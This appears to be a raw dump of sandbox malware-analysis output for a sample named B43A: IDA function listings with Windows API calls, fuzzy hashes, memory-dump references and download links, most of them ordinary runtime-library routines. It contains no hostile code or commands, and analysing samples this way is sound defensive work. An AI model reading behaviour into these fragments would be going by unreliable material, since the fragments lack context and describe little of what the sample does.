                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                                                                                                  • String ID: E_a$csm$csm
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3493665558-3628868959
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5bdafe2a829d9d29152a84478407d2beec1b560bc9f9ea1a736ab253a52d89d8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a77637f490e7476075fbbe46a02e6b8ac15da1fbf19f7fb7014fff0779d0fb65
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5bdafe2a829d9d29152a84478407d2beec1b560bc9f9ea1a736ab253a52d89d8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9231B432510A68ABCF268F50EE448EE7B67FF09335B14815AFC544A261D332CD61DF91
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ___addlocaleref.LIBCMT ref: 004073E8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004072AE: InterlockedIncrement.KERNEL32(?), ref: 004072C0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004072AE: InterlockedIncrement.KERNEL32(?), ref: 004072CD
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004072AE: InterlockedIncrement.KERNEL32(?), ref: 004072DA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004072AE: InterlockedIncrement.KERNEL32(?), ref: 004072E7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004072AE: InterlockedIncrement.KERNEL32(?), ref: 004072F4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004072AE: InterlockedIncrement.KERNEL32(?), ref: 00407310
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004072AE: InterlockedIncrement.KERNEL32(00000000), ref: 00407320
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004072AE: InterlockedIncrement.KERNEL32(?), ref: 00407336
                                                                                                                                                                                                                                                                                                                                  • ___removelocaleref.LIBCMT ref: 004073F3
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040733D: InterlockedDecrement.KERNEL32(00406DA8), ref: 00407357
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040733D: InterlockedDecrement.KERNEL32(A5F32A72), ref: 00407364
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040733D: InterlockedDecrement.KERNEL32(9000406F), ref: 00407371
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040733D: InterlockedDecrement.KERNEL32(749524FF), ref: 0040737E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040733D: InterlockedDecrement.KERNEL32(83000000), ref: 0040738B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040733D: InterlockedDecrement.KERNEL32(83000000), ref: 004073A7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040733D: InterlockedDecrement.KERNEL32(C35D10C4), ref: 004073B7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040733D: InterlockedDecrement.KERNEL32(848D244B), ref: 004073CD
                                                                                                                                                                                                                                                                                                                                  • ___freetlocinfo.LIBCMT ref: 00407407
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407165: ___free_lconv_mon.LIBCMT ref: 004071AB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407165: ___free_lconv_num.LIBCMT ref: 004071CC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407165: ___free_lc_time.LIBCMT ref: 00407251
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118092287.0000000000403000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2117929397.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118008646.0000000000401000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118217497.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118781005.0000000000494000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                                                                                                                                                                                                                                                                                                  • String ID: 'I
                                                                                                                                                                                                                                                                                                                                  • API String ID: 467427115-315217059
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 89ba9a8238ab8529df8984933ea7794b7c43c9145d4eabccec191ffe6770d356
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 86d1a88e1a570d3005b8f844e527bc306501b56addd1fb2c840ebcfde5f4ce3a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89ba9a8238ab8529df8984933ea7794b7c43c9145d4eabccec191ffe6770d356
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7E04F22F0A53156CA332669784166B9A940FC1B14B2A407BF844B73C6DB3C6C8688EF
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0062975D,00000000,00000000,00000000,?,?,?,006295A5,00000000,FlsAlloc,0063506C,00635074), ref: 006296CE
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0062975D,00000000,00000000,00000000,?,?,?,006295A5,00000000,FlsAlloc,0063506C,00635074,00000000,?,00621939), ref: 006296D8
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00629700
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 66375b3db83e8d9424daabcab68fd805a95b4433450780bd77c5839068b4f8bb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ad6b6a8a648d4f705b4cc07c330d6008d3264dd8c440d24a2fa927ff86217099
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66375b3db83e8d9424daabcab68fd805a95b4433450780bd77c5839068b4f8bb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AE04831290B08BBDB101F60FC06BD93B97AB60B51F104020F90CE51E0DB63A96089D4
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e2428ea8ffb6702ee567ac57b4bf48c757237b5dd35d995b0be89531241a62cb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5a8d7cff44dce7b18512a4add1309a4e8ca7d7bf38947663c01a733592fc5efd
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2428ea8ffb6702ee567ac57b4bf48c757237b5dd35d995b0be89531241a62cb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40B12632A01A659FEB11CF68D841BEEBBF6FF95340F15406AE855AB341DA348D01CF60
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1547350101-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fa5b429a34a256a7f892f1df2189429012d112fbb42cd548eff2f0aed0031d3a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5381f3e58e2f54846c4a38e299add1cee7abe5c322666db9e0f44b880034b4f2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa5b429a34a256a7f892f1df2189429012d112fbb42cd548eff2f0aed0031d3a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 384115729006059BDBA1AFF98C46BDD37ABAF49330F2C1518F914E72A1DB34C9C14B64
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0061D716,?,?,?,?,005C146B,?,?,?,?,?,?), ref: 006223A4
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00622401
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00622437
                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000007,000000FF,?,0061D716,?,?,?,?,005C146B,?,?,?,?,?,?), ref: 00622442
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 69c638e8585ad8ebdade22b8fbbf5184f9e79006b80a84eae13c1eb1a91f2952
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b44ebfce5af85361785a37651948682a69821dd41aedd5249e0fd228cf0f1266
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69c638e8585ad8ebdade22b8fbbf5184f9e79006b80a84eae13c1eb1a91f2952
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D911E372208F337BC7913AB4BCA197A22DB9BD17B0B250238F525962E1DF258D114D64
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0061C29E,00623AC2), ref: 006224FB
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00622558
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0062258E
                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000007,000000FF,?,?,?,0061C29E,00623AC2), ref: 00622599
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6073213c310da0d2f1ac678cbfe5e62c5b78d2e166b439d2759f6de7cdbe3bd7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1851dd8a6fbe4e8a9c434590c8b1211920791b8cbfa3bb0b7bd88c7a8ce52af2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6073213c310da0d2f1ac678cbfe5e62c5b78d2e166b439d2759f6de7cdbe3bd7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6511E972208F237FC7913BB8BCB5D6A229B9BD13B4B258238F125A62D1DF618D114D54
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000010,?,00000000,00000000,00000010,?,0062B483,00000010,00000001,00000010,00000010,?,00625C86,?,00638D38,00000010), ref: 0062D963
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0062B483,00000010,00000001,00000010,00000010,?,00625C86,?,00638D38,00000010,?,00000010,?,0062571A,0061D33D), ref: 0062D96F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0062D9C0: CloseHandle.KERNEL32(FFFFFFFE,0062D97F,?,0062B483,00000010,00000001,00000010,00000010,?,00625C86,?,00638D38,00000010,?,00000010), ref: 0062D9D0
                                                                                                                                                                                                                                                                                                                                  • ___initconout.LIBCMT ref: 0062D97F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0062D9A1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0062D93D,0062B470,00000010,?,00625C86,?,00638D38,00000010,?), ref: 0062D9B4
                                                                                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000010,?,00000000,00000000,?,0062B483,00000010,00000001,00000010,00000010,?,00625C86,?,00638D38,00000010,?), ref: 0062D994
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8a8942286b2eb61fec797804332d2828faf7fe20ff5b630d6b8ee9d5f1965b84
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 07c49684aab7ce20dee86ffab444b33c137657e74e120c1921447ae99ce20de7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a8942286b2eb61fec797804332d2828faf7fe20ff5b630d6b8ee9d5f1965b84
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37F01C37800925BFCF622F95EC04ACA3F67EB083A0B005011FA0996160DA328A60DFD5
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00618DF0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006232E2: RtlFreeHeap.NTDLL(00000000,00000000,?,006262EA,?,00000000,?,?,?,006261F5,?,00000007,?,?,0062693B,?), ref: 006232F8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006232E2: GetLastError.KERNEL32(?,?,006262EA,?,00000000,?,?,?,006261F5,?,00000007,?,?,0062693B,?,?), ref: 0062330A
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00618E03
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00618E14
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00618E25
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e9b17f74d81b8e61c4bfdf3906dde94cffdfb8b85c2dbc5412f694048b5e2db4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6c39f9282e25528e934db070b3f6eb1095c4330633e23b387f05cbb15580b54b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9b17f74d81b8e61c4bfdf3906dde94cffdfb8b85c2dbc5412f694048b5e2db4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACE0927AC21B31DB87427F64FD5284A3A23EB44710B51A12AF82152335C7BA1B529FC9
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0062DE3F), ref: 0062E4EC
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: DecodePointer
                                                                                                                                                                                                                                                                                                                                  • String ID: (tc$E_a
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3527080286-1904774616
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d0c4822d9e06ea136447c3e567670ba63be00849fb9253859482a8e45a0103ee
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 40b6485d8d1dc920adaee8354a84a27d1dcb612202e390de58e5f97092acc0b1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0c4822d9e06ea136447c3e567670ba63be00849fb9253859482a8e45a0103ee
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E519EB090492ACBCF209F98F94C1ECBFB6FB15308F5500A5E481A7365CB769926CF90
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                                                                                                  • String ID: pc
                                                                                                                                                                                                                                                                                                                                  • API String ID: 269201875-4198375302
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 52b190f7b2793ae24b16d8b4da0749da8fcc679e6712715111bdeffa7b17df70
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c50cfce35dfb87a44a2a1a041ff60f2a04d58e478be181103c9bfe0f067d3a92
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52b190f7b2793ae24b16d8b4da0749da8fcc679e6712715111bdeffa7b17df70
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2411B171E10B3186E760AF38BC05B563697AB52730F14522AF561DA3E0E3B8DB824FC0
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 005C2898
                                                                                                                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,\Last Version), ref: 005C28A0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0061D6C5: _free.LIBCMT ref: 0061D6D8
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
